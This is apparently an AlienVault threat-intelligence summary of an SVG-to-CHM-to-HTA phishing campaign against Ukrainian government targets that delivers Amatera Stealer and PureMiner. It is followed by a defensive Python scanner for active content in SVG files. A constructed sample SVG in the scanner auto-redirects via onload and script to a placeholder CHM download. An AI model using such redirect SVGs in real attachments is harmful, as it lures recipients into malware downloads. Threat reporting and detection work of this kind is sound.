A phishing campaign targeting Ukrainian government entities uses malicious SVG files to initiate an infection chain. The attack begins with emails containing SVG attachments that redirect victims to a download site. A CHM file is then used to execute a remote HTA loader, which delivers two malware payloads: Amatera Stealer and PureMiner. Amatera Stealer harvests extensive information from infected systems, including credentials, system data, application data, browser files, and cryptocurrency wallets. PureMiner collects hardware information and monitors system activity to deploy efficient CPU or GPU mining modules. The campaign demonstrates sophisticated techniques, including fileless malware delivery and the use of multiple stages to evade detection.

Author: AlienVault
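As an added defender-side example that is not part of the AlienVault pulse, the following Python scanner flags the kinds of active content (script elements, event-handler attributes, external or scheme-based links, and foreignObject blocks) that let an SVG attachment redirect a recipient to a download site, as the first stage above describes. The two sample SVG documents and the `download.example.invalid` URL are constructed for the example, not artifacts from the campaign.

```python
import xml.etree.ElementTree as ET

# URL schemes in an href that indicate navigation or code rather than a local reference.
RISKY_SCHEMES = ("http://", "https://", "javascript:", "data:")


def _local(name: str) -> str:
    """Strip an XML namespace prefix such as '{http://www.w3.org/2000/svg}' from a tag or attribute."""
    return name.rsplit("}", 1)[-1]


def scan_svg(svg_text: str) -> list:
    """Return (finding, detail) tuples for active content found in an SVG document."""
    findings = []
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        # Malformed XML is itself worth flagging: browsers render more leniently than parsers.
        return [("parse-error", str(exc))]
    for elem in root.iter():
        tag = _local(elem.tag).lower()
        if tag == "script":
            findings.append(("script-element", (elem.text or "").strip()[:60]))
        elif tag == "foreignobject":
            findings.append(("foreignObject", "embedded HTML/XHTML content"))
        for attr, value in elem.attrib.items():
            name = _local(attr).lower()          # xlink:href and href both become "href"
            if name.startswith("on"):
                findings.append(("event-handler", f"{tag}@{name}"))
            elif name == "href" and value.lower().startswith(RISKY_SCHEMES):
                findings.append(("external-link", f"{tag} -> {value}"))
    return findings


def is_suspicious(svg_text: str) -> bool:
    """True when the SVG carries anything beyond static drawing content."""
    return bool(scan_svg(svg_text))


# Constructed benign sample: a plain drawing with no active content.
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <circle cx="50" cy="50" r="40" fill="blue"/>
</svg>"""

# Constructed suspicious sample imitating an attachment that redirects when opened.
SUSPICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     onload="window.location='https://download.example.invalid/doc.chm'">
  <script>window.open('https://download.example.invalid/doc.chm')</script>
  <a xlink:href="https://download.example.invalid/doc.chm"><text y="20">Open document</text></a>
</svg>"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("suspicious", SUSPICIOUS_SVG)):
        print(label, scan_svg(doc))
```

The scanner is meant for mail-gateway or sandbox triage of attachments; a non-empty result is a reason to detonate or quarantine, not proof of malice on its own.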
Related Tags:
CountLoader
PureMiner
Amatera Stealer
T1218.001
svg
chm
T1059.007
data theft
fileless
Associated Indicators: